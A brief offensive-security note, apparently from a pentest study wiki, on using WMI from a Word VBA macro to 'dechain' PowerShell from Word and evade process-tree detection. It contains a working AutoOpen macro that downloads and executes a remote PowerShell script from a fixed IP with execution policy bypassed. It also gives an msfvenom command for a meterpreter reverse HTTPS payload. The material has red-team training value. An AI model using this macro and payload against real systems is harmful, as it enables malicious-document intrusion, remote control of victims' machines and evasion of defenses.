Dechaining with WMI

Our goal is to use WMI from VBA to create a PowerShell process instead of having it as a child process of Microsoft Word.

Sub MyMacro()
    strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.220.128/run.ps1'))"
    GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub
Sub AutoOpen()
    MyMacro
End Sub

When the macro is executed, a new PowerShell prompt opens and PowerShell will be running as a child process of WmiPrvSE.exe and not Microsoft Word. Because of this 64 bit.

Keep in mind that shellcode runner should also be 64 bit

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f ps1

Use PowerShell in memory -> PowerShell in memory (reflection)

Last updated 2 years ago